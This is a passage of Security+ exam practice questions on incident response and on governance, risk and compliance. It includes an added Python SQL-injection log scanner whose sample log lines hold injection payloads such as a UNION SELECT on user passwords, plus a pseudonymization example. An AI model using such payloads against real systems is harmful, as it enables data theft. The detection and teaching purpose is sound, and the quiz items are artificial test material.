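Question 121 points Valerie at the web server's access log, where the injected input shows up URL-encoded in the request line. The following Python is an added example, not code from the book: it parses constructed access log lines, URL-decodes each request path repeatedly (attackers double-encode to slip past naive filters), and flags requests that carry SQL injection indicators such as quote-tautologies, UNION SELECT, stacked DML statements and time-based probes, while treating a bare comment marker as too weak to alert on alone. The log format, addresses and requests are constructed.

```python
import re
from urllib.parse import unquote_plus

# Apache/nginx-style access log line: ip ident user [ts] "METHOD path proto" status size
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# (pattern, label) pairs evaluated against the decoded request path.
SQLI_INDICATORS = [
    (re.compile(r"'\s*(?:or|and)\s+[\w'\"]+\s*=\s*[\w'\"]+", re.I), "tautology"),
    (re.compile(r"\bunion\b(?:\s|/\*.*?\*/)+(?:all\s+)?select\b", re.I), "union-select"),
    (re.compile(r"(?:;|\s)(?:drop|delete|insert|update)\s", re.I), "stacked-dml"),
    (re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(|waitfor\s+delay", re.I), "time-based"),
    (re.compile(r"--|/\*|#"), "comment"),
]
STRONG = {"tautology", "union-select", "stacked-dml", "time-based"}


def fully_decode(s, rounds=3):
    """Undo URL encoding until the string stops changing (bounded)."""
    for _ in range(rounds):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s


def scan_access_log(lines):
    """Return one finding per request line that carries a strong SQLi indicator."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # malformed or different log format
        path = fully_decode(m.group("path"))
        labels = [label for pat, label in SQLI_INDICATORS if pat.search(path)]
        if not STRONG.intersection(labels):
            continue
        findings.append({
            "ip": m.group("ip"),
            "ts": m.group("ts"),
            "status": int(m.group("status")),
            "path": path,
            "indicators": labels,
        })
    return findings


# Constructed sample log: a normal request, a tautology, a UNION SELECT that
# produced a 500, an unrelated POST, and a double-encoded tautology.
SAMPLE_LOG = [
    '198.51.100.23 - - [02/Mar/2021:10:15:31 +0000] "GET /products?id=42 HTTP/1.1" 200 5120',
    '198.51.100.23 - - [02/Mar/2021:10:15:40 +0000] "GET /products?id=42%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 98213',
    '198.51.100.23 - - [02/Mar/2021:10:16:02 +0000] "GET /products?id=42%20UNION%20SELECT%20username%2Cpassword%20FROM%20users-- HTTP/1.1" 500 512',
    '203.0.113.5 - - [02/Mar/2021:10:17:10 +0000] "POST /login HTTP/1.1" 302 0',
    '198.51.100.23 - - [02/Mar/2021:10:18:55 +0000] "GET /products?id=42%2527%2520OR%25201%253D1 HTTP/1.1" 200 98213',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

Two caveats a practitioner will want: the access log only records the request line, so injection carried in POST bodies, cookies or headers needs the application's own logging or a WAF/mod_security audit log; and a response size that jumps (the 98213-byte reply after the tautology) or a 500 after a payload is often the first real signal that the injection worked rather than merely being attempted.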
122. Olivia's company has experienced a breach and believes that the attackers were able to access the company's web servers. There is evidence that the private keys for the certificates for the server were exposed and that the passphrases for the certificates were kept in the same directory. What action should Olivia take to handle this issue?
A. Revoke the certificates.
B. Change the certificate password.
C. Change the private key for the certificate.
D. Change the public key for the certificate.
123. Jean's company is preparing for litigation with another company that they believe has caused harm to Jean's organization. What type of legal action should Jean's lawyer take to ensure that the company preserves files and information related to the legal case?
A. A chain of custody demand letter
B. An e-discovery notice
C. A legal hold notice
D. An order of volatility
124. Cynthia wants to display all of the active connections on a Windows system. What command can she run to do so?
A. route
B. netstat -a
C. netstat -c
D. hping
125. What type of mitigation places a malicious file or application in a safe location for future review or study?
A. Containment
B. Quarantine
C. Isolation
D. Deletion
126. What location is commonly used for Linux swap space?
A. \root\swap
B. \etc\swap
C. \proc\swap
D. A separate partition
127. Marco is conducting a forensic investigation and is preparing to pull eight different storage devices from computers that he will analyze. What should he use to track the drives as he works with them?
A. Tags with system, serial number, and other information
B. MD5 checksums of the drives
C. Timestamps gathered from the drives
D. None of the above; the drives can be identified by the data they contain
128. Isaac executes the following command using netcat:
nc -v 10.11.10.11 -1024
What has he done?
A. Opened a web page
B. Connected to a remote shell
C. Opened a local shell listener
D. Performed a port scan
129. Tony works for a large company with multiple sites. He has identified an incident in progress at one site that is connected to the organization's multisite intranet. Which of the following options is best suited to preserving the organization's function and protecting it from issues at that location?
A. Isolation
B. Containment
C. Segmentation
D. None of the above
130. Which of the following environments is least likely to allow a right-to-audit clause in a contract?
A. A data center co-location facility in your state
B. A rented facility for a corporate headquarters
C. A cloud server provider
D. A data center co-location facility in the same country but not the same state
131. Alaina's organization has been suffering from successful phishing attacks, and Alaina notices a new email that has arrived with a link to a phishing site. What response option from the following will be most likely to stop the phishing attack from succeeding against her users?
A. A WAF
B. A patch
C. An allow list
D. A URL filter
132. Ben writes down the checklist of steps that his organization will perform in the event of a cryptographic malware infection. What type of response document has he created?
A. A playbook
B. A DR plan
C. A BC plan
D. A runbook
133. Which of the following is not information that can be gathered from a system by running the arp command?
A. The IP address of the local system
B. The MAC addresses of recently resolved external hosts
C. Whether the IP address is dynamic or static
D. The MAC addresses of recently resolved local hosts
134. What log will journalctl provide Selah access to?
A. The event log
B. The auth log
C. The systemd journal
D. The authentication journal
135. What phase of the incident response process often involves adding firewall rules and patching systems to address the incident?
A. Preparation
B. Eradication
C. Recovery
D. Containment
136. Gary wants to use a tool that will allow him to download files via HTTP and HTTPS, SFTP, and TFTP from within the same script. Which command-line tool should he pick from the following list?
A. curl
B. hping
C. theHarvester
D. nmap
137. Tim wants to check the status of malware infections in his organization using the organization's security information and event management (SIEM) device. What SIEM dashboard will tell him about whether there are more malware infections in the past few days than normal?
A. The alerts dashboard
B. The sensors dashboard
C. The trends dashboard
D. The bandwidth dashboard
138. Warren is gathering information about an incident and wants to follow up on a report from an end user. What digital forensic technique is often used when end users are a key part of the initial incident report?
A. Email forensics
B. Interviews
C. Disk forensics
D. Chain of custody
139. Aaron wants to use a multiplatform logging tool that supports both Windows and Unix/Linux systems and many log formats. Which of the following tools should he use to ensure that his logging environment can accept and process these logs?
A. IPFIX
B. NXLog
C. syslog
D. journalctl
140. Which of the following is not a common type of incident response exercise?
A. Drills
B. Simulations
C. Tabletop
D. Walk-throughs
141. Susan needs to run a port scan of a network. Which of the following tools would not allow her to perform that type of scan?
A. netstat
B. netcat
C. nmap
D. Nessus
142. What term belongs at point A on the Diamond Model of Intrusion Analysis shown below?
A. Opponent
B. Target
C. Adversary
D. System
143. The government agency that Vincent works for has received a Freedom of Information Act (FoIA) request and needs to provide the requested information from its email servers. What is this process called?
Chapter 5 Governance, Risk, and Compliance
THE COMPTIA SECURITY+ EXAM SY0-601 TOPICS COVERED IN THIS CHAPTER INCLUDE THE FOLLOWING:
5.1 Compare and contrast various types of controls
5.2 Explain the importance of applicable regulations, standards, or frameworks that impact organizational security posture
5.3 Explain the importance of policies to organizational security
5.4 Summarize risk management processes and concepts
5.5 Explain privacy and sensitive data concepts in relation to security
1. Caroline has been asked to find an international standard to guide her company's choices in implementing information security management systems. Which of the following would be the best choice for her?
A. ISO 27002
B. ISO 27017
C. NIST 800-12
D. NIST 800-14
2. Adam is concerned about malware infecting machines on his network. One of his concerns is that malware would be able to access sensitive system functionality that requires administrative access. What technique would best address this issue?
A. Implementing host-based antimalware
B. Using a nonadministrative account for normal activities
C. Implementing full-disk encryption (FDE)
D. Making certain the operating systems are patched
3. You are responsible for setting up new accounts for your company network. What is the most important thing to keep in mind when setting up new accounts?
A. Password length
B. Password complexity
C. Account age
D. Least privileges
4. Which of the following principles stipulates that multiple changes to a computer system should not be made at the same time?
A. Due diligence
B. Acceptable use
C. Change management
D. Due care
5. You are a security engineer and discovered an employee using the company's computer systems to operate their small business. The employee installed their personal software on the company's computer and is using the computer hardware, such as the USB port. What policy would you recommend the company implement to prevent any risk of the company's data and network being compromised?
A. Acceptable use policy
B. Clean desk policy
C. Mandatory vacation policy
D. Job rotation policy
6. What standard is used for credit card security?
A. GDPR
B. COPPA
C. PCI-DSS
D. CIS
7. You are a security manager for your company and need to reduce the risk of employees working in collusion to embezzle funds. Which of the following policies would you implement?
A. Mandatory vacations
B. Clean desk
C. NDA
D. Continuing education
8. After your company implemented a clean desk policy, you have been asked to secure physical documents every night. Which of the following would be the best solution?
A. Department door lock
B. Locking cabinets and drawers at each desk
C. Proximity cards
D. Onboarding
9. Which of the following techniques attempts to predict the likelihood a threat will occur and assigns monetary values should a loss occur?
A. Change management
B. Vulnerability assessment
C. Qualitative risk assessment
D. Quantitative risk assessment
10. Which of the following agreements is less formal than a traditional contract but still has a certain level of importance to all parties involved?
A. SLA
B. BPA
C. ISA
D. MOU
11. As part of the response to a credit card breach, Sally discovers evidence that individuals in her organization were actively working to steal credit card information and personally identifiable information (PII). She calls the police to engage them for the investigation. What has she done?
A. Escalated the investigation
B. Public notification
C. Outsourced the investigation
D. Tokenized the data
12. You have an asset that is valued at $16,000, the exposure factor of a risk affecting that asset is 35 percent, and the annualized rate of occurrence is 75 percent. What is the SLE?
A. $5,600
B. $5,000
C. $4,200
D. $3,000
13. During a meeting, you present management with a list of access controls used on your network. Which of the following controls is an example of a corrective control?
A. IDS
B. Audit logs
C. Antivirus software
D. Router
14. You are the new security administrator and have discovered your company lacks deterrent controls. Which of the following would you install that satisfies your needs?
A. Lighting
B. Motion sensor
C. Hidden video cameras
D. Antivirus scanner
15. Your company's security policy includes system testing and security awareness training guidelines. Which of the following control types is this?
A. Detective technical control
B. Preventive technical control
C. Detective administrative control
D. Preventive administrative control
16. You are a security administrator for your company and you identify a security risk. You decide to continue with the current security plan. However, you develop a contingency plan in case the security risk occurs. Which of the following types of risk response technique are you demonstrating?
A. Accept
B. Transfer
C. Avoid
D. Mitigate
17. Jim's company operates facilities in Illinois, Indiana, and Ohio, but the headquarters is in Illinois. Which state laws does Jim need to review and handle as part of his security program?
A. All U.S. state laws
B. Illinois
C. Only U.S. federal laws
D. State laws in Illinois, Indiana, and Ohio
18. You are an IT administrator for a company and you are adding new employees to an organization's identity and access management system. Which of the following best describes the process you are performing?
A. Onboarding
B. Offboarding
C. Adverse action
D. Job rotation
19. Mark is an office manager at a local bank branch. He wants to ensure that customer information isn't compromised when the deskside employees are away from their desks for the day. What security concept would Mark use to mitigate this concern?
A. Clean desk
B. Background checks
C. Continuing education
D. Job rotation
20. You are a security administrator and advise the web development team to include a CAPTCHA on the web page where users register for an account. Which of the following controls is this referring to?
A. Deterrent
B. Detective
C. Compensating
D. Degaussing
21. Which of the following is not a common security policy type?
A. Acceptable use policy
B. Social media policy
C. Password policy
D. Parking policy
22. As the IT security officer for your organization, you are configuring data label options for your company's research and development file server. Regular users can label documents as contractor, public, or internal. Which label should be assigned to company trade secrets?
A. High
B. Top secret
C. Proprietary
D. Low
23. Which of the following is not a physical security control?
A. Motion detector
B. Fence
C. Antivirus software
D. Closed-circuit television (CCTV)
24. Your security manager wants to decide which risks to mitigate based on cost. What is this an example of?
A. Quantitative risk assessment
B. Qualitative risk assessment
C. Business impact analysis
D. Threat assessment
25. Your company has outsourced its proprietary processes to Acme Corporation. Due to technical issues, Acme wants to include a third-party vendor to help resolve the technical issues. Which of the following must Acme consider before sending data to the third party?
A. This data should be encrypted before it is sent to the third-party vendor.
B. This may constitute unauthorized data sharing.
C. This may violate the privileged user role-based awareness training.
D. This may violate a nondisclosure agreement.
26. Which of the following is considered a detective control?
A. Closed-circuit television (CCTV)
B. An acceptable use policy
C. Firewall
D. IPS
27. Which of the following is typically included in a BPA?
A. Clear statements detailing the expectation between a customer and a service provider
B. The agreement that a specific function or service will be delivered at the agreed-on level of performance
C. Sharing of profits and losses and the addition or removal of a partner
D. Security requirements associated with interconnecting IT systems
28. You are the network administrator of your company, and the manager of a retail site located across town has complained about the loss of power to their building several times this year. The branch manager is asking for a compensating control to overcome the power outage. What compensating control would you recommend?
A. Firewall
B. Security guard
C. IDS
D. Backup generator
29. James is a security administrator and is attempting to block unauthorized access to the desktop computers within the company's network. He has configured the computers' operating systems to lock after 5 minutes of no activity. What type of security control has James implemented?
A. Preventive
B. Corrective
C. Deterrent
D. Detective
30. An accounting employee changes roles with another accounting employee every 4 months. What is this an example of?
A. Separation of duties
B. Mandatory vacation
C. Job rotation
D. Onboarding
31. Tony's company wants to limit their risk due to customer data. What practice should they put in place to ensure that they have only the data needed for their business purposes?
A. Data masking
B. Data minimization
C. Tokenization
D. Anonymization
32. Your company website is hosted by an Internet service provider. Which of the following risk response techniques is in use?
A. Risk avoidance
B. Risk register
C. Risk acceptance
D. Risk mitigation
33. A security administrator is reviewing the company's continuity plan, and it specifies an RTO of four hours and an RPO of one day. Which of the following is the plan describing?
A. Systems should be restored within one day and should remain operational for at least four hours.
B. Systems should be restored within four hours and no later than one day after the incident.
C. Systems should be restored within one day and lose, at most, four hours' worth of data.
D. Systems should be restored within four hours with a loss of one day's worth of data at most.
34. Which of the following statements is true regarding a data retention policy?
A. Regulations require financial transactions to be stored for seven years.
B. Employees must remove and lock up all sensitive and confidential documents when not in use.
C. It describes a formal process of managing configuration changes made to a network.
D. It is a legal document that describes a mutual agreement between parties.
35. How do you calculate the annual loss expectancy (ALE) that may occur due to a threat?
A. Exposure factor (EF) / single loss expectancy (SLE)
B. Single loss expectancy (SLE) × annual rate of occurrence (ARO)
C. Asset value (AV) × exposure factor (EF)
D. Single loss expectancy (SLE) / exposure factor (EF)
36. Michelle has been asked to use the CIS benchmark for Windows 10 as part of her system security process. What information will she be using?
A. Information on how secure Windows 10 is in its default state
B. A set of recommended security configurations to secure Windows 10
C. Performance benchmark tools for Windows 10 systems, including network speed and firewall throughput
D. Vulnerability scan data for Windows 10 systems provided by various manufacturers
37. Which of the following is the best example of a preventive control?
A. Data backups
B. Security camera
C. Door alarm
D. Smoke detectors
38. You are a security administrator for your company and you identify a security risk that you do not have in-house skills to address. You decide to acquire contract resources. The contractor will be responsible for handling and managing this security risk. Which of the following types of risk response techniques are you demonstrating?
A. Accept
B. Mitigate
C. Transfer
D. Avoid
39. Each salesperson who travels has a cable lock to lock down their laptop when they step away from the device. To which of the following controls does this apply?
A. Administrative
B. Compensating
C. Deterrent
D. Preventive
40. You are a server administrator for your company's private cloud. To provide service to employees, you are instructed to use reliable hard disks in the server to host a virtual environment. Which of the following best describes the reliability of hard drives?
A. MTTR
B. RPO
C. MTBF
D. ALE
41. All of your organization's traffic flows through a single connection to the Internet. Which of the following terms best describes this scenario?
A. Cloud computing
B. Load balancing
C. Single point of failure
D. Virtualization
42. Which of the following best describes the disadvantages of quantitative risk analysis compared to qualitative risk analysis?
A. Quantitative risk analysis requires detailed financial data.
B. Quantitative risk analysis is sometimes subjective.
C. Quantitative risk analysis requires expertise on systems and infrastructure.
D. Quantitative risk provides clear answers to risk-based questions.
43. Leigh Ann is the new network administrator for a local community bank. She studies the current file server folder structures and permissions. The previous administrator didn't properly secure customer documents in the folders. Leigh Ann assigns appropriate file and folder permissions to be sure that only the authorized employees can access the data. What security role is Leigh Ann assuming?
A. Power user
B. Data owner
C. User
D. Custodian
44. Categorizing residual risk is most important to which of the following risk response techniques?
A. Risk mitigation
B. Risk acceptance
C. Risk avoidance
D. Risk transfer
45. You are the IT manager and one of your employees asks who assigns data labels. Which of the following assigns data labels?
A. Owner
B. Custodian
C. Privacy officer
D. System administrator
46. Which of the following is the most pressing security concern related to social media networks?
A. Other users can view your MAC address.
B. Other users can view your IP address.
C. Employees can leak a company's confidential information.
D. Employees can express their opinion about their company.
47. What concept is being used when user accounts are created by one employee and user permissions are configured by another employee?
A. Background checks
B. Job rotation
C. Separation of duties
D. Collusion
48. A security analyst is analyzing the cost the company could incur if the customer database was breached. The database contains 2,500 records with personally identifiable information (PII). Studies show the cost per record would be $300. The likelihood that the database would be breached in the next year is only 5 percent. Which of the following would be the ALE for a security breach?
A. $15,000
B. $37,500
C. $150,000
D. $750,000
49. Which of the following concepts defines a company goal for system restoration and acceptable data loss?
A. MTBF
B. MTTR
C. RPO
D. ARO
50. Your company hires a third-party auditor to analyze the company's data backup and long-term archiving policy. Which type of organization document should you provide to the auditor?
A. Clean desk policy
B. Acceptable use policy
C. Security policy
D. Data retention policy
51. You are a network administrator and have been given the duty of creating user accounts for new employees the company has hired. These employees are added to the identity and access management system and assigned mobile devices. What process are you performing?
A. Offboarding
B. System owner
C. Onboarding
D. Executive user
52. What type of control is separation of duty?
A. Physical
B. Operational
C. Technical
D. Compensating
53. Which of the following rights is not included in the GDPR?
A. The right to access
B. The right to be forgotten
C. The right to data portability
D. The right to anonymity
54. Nick is following the National Institute of Standards and Technology (NIST) Risk Management Framework (RMF) and has completed the prepare and categorize steps. Which step in the risk management framework is next?
A. Assessing controls
B. Implementing controls
C. Monitoring controls
D. Selecting controls
55. Why is diversity of training techniques an important concept for security program administrators?
A. It allows for multiple funding sources.
B. Each person responds to training differently.
C. It avoids a single point of failure in training compliance.
D. It is required for compliance with PCI-DSS.
56. Alyssa has been asked to categorize the risk of outdated software in her organization. What type of risk categorization should she use?
A. Internal
B. Quantitative
C. Qualitative
D. External
57. What term is used to describe a listing of all of an organization's risks, including information about the risk's rating, how it is being remediated, remediation status, and who owns or is assigned responsibility for the risk?
A. An SSAE
B. A risk register
C. A risk table
D. A DSS
58. Which of the following terms is used to measure how maintainable a system or device is?
A. MTBF
B. MTTF
C. MTTR
D. MITM
59. The company that Olivia works for has recently experienced a data breach that exposed customer data, including their home addresses, shopping habits, email addresses, and contact information. Olivia's company is an industry leader in their space but has strong competitors as well. Which of the following impacts is not likely to occur now that the organization has completed their incident response process?
A. Identity theft
B. Financial loss
C. Reputation loss
D. Availability loss
60. Eric works for the U.S. government and needs to classify data. Which of the following is not a common classification type for U.S. government data?
A. Top Secret
B. Secret
C. Confidential
D. Civilian
61. Which of the following is not a common location for privacy practices to be recorded or codified?
A. A formal privacy notice
B. The source code for a product
C. The terms of the organization's agreement with customers
D. None of the above
62. What key difference separates pseudonymization and anonymization?
A. Anonymization uses encryption.
B. Pseudonymization requires additional data to reidentify the data subject.
C. Anonymization can be reversed using a hash.
D. Pseudonymization uses randomized tokens.
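The distinction question 62 tests is easiest to see in code. The following Python is an added example, not code from the book: pseudonymization swaps each direct identifier for a keyed, deterministic token and keeps a re-identification table, so records for one person stay linkable and anyone holding the key or the table can reverse the process; anonymization drops the identifiers and generalizes the quasi-identifiers (age to a ten-year band, ZIP to its first three digits) so nothing is left to reverse. The records, the key and the generalization rules are constructed for the example.

```python
import hashlib
import hmac

# Assumed: a secret held by the data controller and stored apart from the
# pseudonymised dataset. Whoever has it can reverse the pseudonyms.
PSEUDONYM_KEY = b"rotate-me-and-keep-me-out-of-the-dataset"


def pseudonym(identifier, key=PSEUDONYM_KEY):
    """Keyed, deterministic token: same subject -> same token, so records stay linkable."""
    return hmac.new(key, identifier.strip().lower().encode(), hashlib.sha256).hexdigest()[:16]


def pseudonymize(records, key=PSEUDONYM_KEY):
    """Replace the direct identifier with a token; return data plus the lookup table.

    The table (or the key) is the 'additional data' that makes re-identification
    possible, which is why pseudonymised data is still personal data.
    """
    table = {}
    out = []
    for r in records:
        token = pseudonym(r["email"], key)
        table[token] = r["email"]
        out.append({"subject": token, "age": r["age"], "zip": r["zip"], "purchase": r["purchase"]})
    return out, table


def reidentify(pseudonymized, table):
    """Reverse pseudonymisation using the separately held lookup table."""
    return [{**r, "email": table[r["subject"]]} for r in pseudonymized]


def anonymize(records):
    """Drop direct identifiers and generalise quasi-identifiers; nothing links back."""
    out = []
    for r in records:
        decade = (r["age"] // 10) * 10
        out.append({
            "age_band": f"{decade}-{decade + 9}",
            "zip3": r["zip"][:3],
            "purchase": r["purchase"],
        })
    return out


# Constructed sample records (addresses use the reserved example.com domain).
SAMPLE_RECORDS = [
    {"email": "alice@example.com", "age": 34, "zip": "97201", "purchase": "camera"},
    {"email": "bob@example.com", "age": 58, "zip": "10001", "purchase": "laptop"},
    {"email": "alice@example.com", "age": 34, "zip": "97201", "purchase": "lens"},
]

if __name__ == "__main__":
    data, table = pseudonymize(SAMPLE_RECORDS)
    print(data)
    print(reidentify(data, table))
    print(anonymize(SAMPLE_RECORDS))
```

Because the token is deterministic, using the same key across several datasets lets them be joined on the token; a per-dataset key limits that linkage, and a plain unkeyed hash of an email address is not pseudonymization at all, since anyone can recompute it from a list of candidate addresses.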
63. What policy clearly states the ownership of information created or used by an organization?
A. A data governance policy
B. An information security policy
C. An acceptable use policy
D. A data retention policy
64. Helen's organization provides telephone support for their entire customer base as a critical business function. She has created a plan that will ensure that her organization's Voice over IP (VoIP) phones will be restored in the event of a disaster. What type of plan has she created?
A. A disaster recovery plan
B. An RPO plan
C. A functional recovery plan
D. An MTBF plan
65. Greg has data that is classified as health information that his organization uses as part of their company's HR data. Which of the following statements is true for his company's security policy?
A. The health information must be encrypted.
B. Greg should review relevant law to ensure the health information is handled properly.
C. Companies are prohibited from storing health information and must outsource to third parties.
D. All of the above
66. What type of information does a control risk apply to?
A. Health information
B. Personally identifiable information (PII)
C. Financial information
D. Intellectual property
67. What type of impact is an individual most likely to experience if a data breach that includes PII occurs?
A. IP theft
B. Reputation damage
C. Fines
D. Identity theft
68. Isaac has been asked to write his organization's security policies. What policy is commonly put in place for service accounts?
A. They must be issued only to system administrators.
B. They must use multifactor authentication.
C. They cannot use interactive logins.
D. All of the above
69. Nina is tasked with putting radio frequency identification (RFID) tags on every new piece of equipment that enters her data center that costs more than $500. What type of organizational policy is most likely to include this type of requirement?
A. A change management policy
B. An incident response policy
C. An asset management policy
D. An acceptable use policy
70. Megan is reviewing her organization's data center network diagram as shown in the following image. What should she note for point A on the diagram?
A. A wireless link
B. A redundant connection
C. A wired link
D. A single point of failure
71. Emma is reviewing third-party risks to her organization, and Nate, her organization's procurement officer, notes that purchases of some laptops from the company's hardware vendor have been delayed due to lack of availability of SSDs (solid state drives) and specific CPUs for specific configurations. What type of risk should Emma describe this as?
A. Financial risk
B. A lack of vendor support
C. System integration
D. Supply chain
72. Henry has implemented an intrusion detection system. What category and control type could he list for an IDS?
A. Technical, Detective
B. Administrative, Preventative
C. Technical, Corrective
D. Administrative, Detective
73. Amanda administers Windows 10 workstations for her company and wants to use a secure configuration guide from a trusted source. Which of the following is not a common source for Windows 10 security benchmarks?
A. CIS
B. Microsoft
C. The FTC
D. The NSA
74. Katie has discovered a Windows 2008 web server running in her environment. What security concern should she list for this system?
A. Windows 2008 only runs on 32-bit platforms.
B. Windows 2008 cannot run modern web server software.
C. Windows 2008 has reached its end of life and cannot be patched.
D. All of the above
75. Patching systems immediately after patches are released is an example of what risk management strategy?
A. Acceptance
B. Avoidance
C. Mitigation
D. Transference
76. Charles wants to display information from his organization's risk register in an easy-to-understand and -rank format. What common tool is used to help management quickly understand relative rankings of risk?
A. Risk plots
B. A heat map
C. A qualitative risk assessment
D. A quantitative risk assessment
77. What key element of regulations, like the European Union's (EU's) GDPR, drives organizations to include them in their overall assessment of risk posture?
A. Potential fines
B. Their annual loss expectancy (ALE)
C. Their recovery time objective (RTO)
D. The likelihood of occurrence
78. What phases of handling a disaster are covered by a disaster recovery plan?
A. What to do before the disaster
B. What to do during the disaster
C. What to do after the disaster
D. All of the above
79. Naomi's organization has recently experienced a breach of credit card information. After investigation, it is discovered that her organization was inadvertently not fully compliant with PCI-DSS and is not currently fully compliant. Which of the following penalties is her organization most likely to incur?
A. Criminal charges
B. Fines
C. Termination of the credit card processing agreement
D. All of the above
80. Alaina wants to map a common set of controls for cloud services between standards like COBIT (Control Objectives for Information and Related Technology), FedRAMP (Federal Risk and Authorization Management Program), HIPAA (the Health Insurance Portability and Accountability Act of 1996), and others. What can she use to speed up that process?
A. The CSA's reference architecture
B. ISO 27001
C. The CSA's cloud control matrix
D. ISO 27002
81. Gary has created an application that new staff in his organization are asked to use as part of their training. The application shows them examples of phishing emails and asks the staff members to identify the emails that are suspicious and why. Correct answers receive points, and incorrect answers subtract points. What type of user training technique is this?
A. Capture the flag
B. Gamification
C. Phishing campaigns
D. Role-based training
82. What law or regulation requires a DPO in organizations?
A. FISMA
B. COPPA
C. PCI-DSS
D. GDPR
83. The university that Susan works for conducts top secret research for the U.S. Department of Defense as part of a partnership with its engineering school. A recently discovered breach points to the school being compromised for over a year by an advanced persistent threat actor. What consequence of the breach should Susan be most concerned about?
A. Cost to restore operations
B. Fines
C. Identity theft
D. IP theft
84. What term is used to describe the functions that need to be continued throughout or resumed as quickly as possible after a disaster?
A. Single points of failure
B. Mission-essential functions
C. Recovery time objectives
D. Core recovery functions
85. Your company is considering moving its mail server to a hosting company. This will help reduce hardware and server administrator costs at the local site. Which of the following documents would formally state the reliability and recourse if the reliability is not met?
A. MOU
B. SLA
C. ISA
D. BPA
86. Rick's organization provides a website that allows users to create an account and then upload their art to share with other users. He is concerned about a breach and wants to properly classify the data for their handling process. What data type is most appropriate for Rick to label the data his organization collects and stores?
A. Customer data
B. PII
C. Financial information
D. Health information
87. Jack is conducting a risk assessment, and a staff member notes that the company has specialized, internal AI algorithms that are part of the company's main product. What risk should Jack identify as most likely to impact those algorithms?
A. External
B. Internal
C. IP theft
D. Licensing
88. Dan has written a policy that prohibits employees from sharing their passwords with their coworkers, family members, or others. What type of credential policy has he created?
A. Device credential policy
B. Personnel credential policy
C. A service account policy
D. An administrative account policy
89. Risk severity is calculated using the equation shown here. What information should be substituted for X?
Risk severity = X * Impact
A. Inherent risk
B. MTTR (mean time to repair)
C. Likelihood of occurrence
D. RTO (recovery time objective)
90. How is asset value determined?
A. The original cost of the item
B. The depreciated cost of the item
C. The cost to replace the item
D. Any of the above based on organizational preference
91. What process is used to help identify critical systems?
A. A BIA
B. An MTBF
C. An RTO
D. An ICD
92. Zarmeena wants to transfer the risk for breaches to another organization. Which of the following options should she use to transfer the risk?
A. Explain to her management that breaches will occur.
B. Blame future breaches on competitors.
C. Sell her organization's data to another organization.
D. Purchase cybersecurity insurance.
93. Which of the following is a common security policy for service accounts?
A. Limiting login hours
B. Prohibiting interactive logins
C. Limiting login locations
D. Implementing frequent password expiration
94. The financial cost of a breach is an example of what component of risk calculations?
A. Probability
B. Risk severity
C. Impact
D. All of the above
95. As part of his organization's effort to identify a new headquarters location, Sean reviews the Federal Emergency Management Agency (FEMA) flood maps for the potential location he is reviewing. What process related to disaster recovery planning includes actions like this?
A. Business impact analysis (BIA)
B. Site risk assessment
C. Crime prevention through environmental design
D. Business continuity planning
96. Joanna wants to request an audit report from a vendor she is considering and plans to review the auditor's opinions on the effectiveness of the security and privacy controls the vendor has in place. What type of Standard for Attestation Engagements (SSAE) should she request?
A. SSAE-18 SOC 1, Type 2
B. SSAE-18 SOC 2, Type 1
C. SSAE-18 SOC 1, Type 1
D. SSAE-18 SOC 2, Type 2
97. Jason has created a risk register for his organization and regularly updates it with input from managers and senior leadership throughout the organization. What purpose does this serve?
A. It decreases inherent risk.
B. It increases risk awareness.
C. It decreases residual risk.
D. It increases risk appetite.
98. Laura is aware that her state has laws that guide her organization in the event of a breach of personally identifiable information, including Social Security numbers (SSNs). If she has a breach that involves SSNs, what action is she likely to have to take based on state law?
A. Destroy all Social Security numbers.
B. Reclassify all impacted data.
C. Provide public notification of the breach.
D. Provide a data minimization plan.
99. Which of the following does not minimize security breaches committed by internal employees?
A. Job rotation
B. Separation of duties
C. Nondisclosure agreements signed by employees
D. Mandatory vacations
100. Olivia's cloud service provider claims to provide "five nines of uptime" and Olivia's company wants to take advantage of that service because their website loses thousands of dollars every hour that it is down. What business agreement can Olivia put in place to help ensure that the reliability that the vendor advertises is maintained?
A. An MOU
B. An SLA
C. An MSA
D. A BPA
101. After reviewing systems on his network, Brian has discovered that dozens of them are running copies of a CAD software package that the company has not paid for. What risk type should he identify this as?
A. Internal
B. Legacy systems
C. IP theft
D. Software compliance
102. Gary is beginning his risk assessment for the organization and has not yet begun to implement controls. What risk does his organization face?
A. Residual risk
B. IP theft risk
C. Multiparty risk
D. Inherent risk
103. How is SLE calculated?
A. AV * EF
B. RTO * AV
C. MTTR * EF
D. AV * ARO
104. What type of credential policy is typically created to handle contractors and consultants?
A. A personnel policy
B. A service account policy
C. A third-party policy
D. A root account policy
105. Wayne has estimated the ARO for a risk in his organization to be 3. How often does Wayne think the event will happen?
A. Once every 3 months
B. Three times a year
C. Once every three years
D. Once a year for three years
106. Gurvinder is assessing risks from disasters to his company's facility and wants to properly categorize them in his planning. Which of the following is not a type of natural disaster?
A. Fire
B. Flood
C. Tornado
D. Industrial accidents
107. Madhuri is classifying all of her organization's data and wants to properly classify the information on the main organizational website that is available to anyone who visits the site. What data classification should she use from the following list?
A. Sensitive
B. Confidential
C. Public
D. Critical
108. Elle works for a credit card company that handles credit card transactions for businesses around the world. What data privacy role does her company play?
A. A data controller
B. A data steward
C. A data custodian
D. A data processor
109. The website that Brian is using shows part of his Social Security number, not all of it, replacing the rest of the digits with asterisks and allowing him to verify the last four digits. What technique is in use on the website?
A. Tokenization
B. Hashing
C. Encryption
D. Data masking
110. Mike wants to look for a common set of tools for security and risk management for his infrastructure as a service (IaaS) environment. Which of the following organizations provides a vendor-neutral reference architecture that he can use to validate his design?
A. The Center for Internet Security (CIS)
B. ISO
C. The Cloud Security Alliance
D. NIST
111. What type of control is a lock?
A. Managerial
B. Technical
C. Physical
D. Corrective
112. Isaac has discovered that his organization's financial accounting software is misconfigured, causing incorrect data to be reported on an ongoing basis. What type of risk is this?
A. Inherent risk
B. Residual risk
C. Control risk
D. Transparent risk
113. Which of the following is not a potential type of person-made disaster?
A. Fires
B. Oil spills
C. Hurricanes
D. War
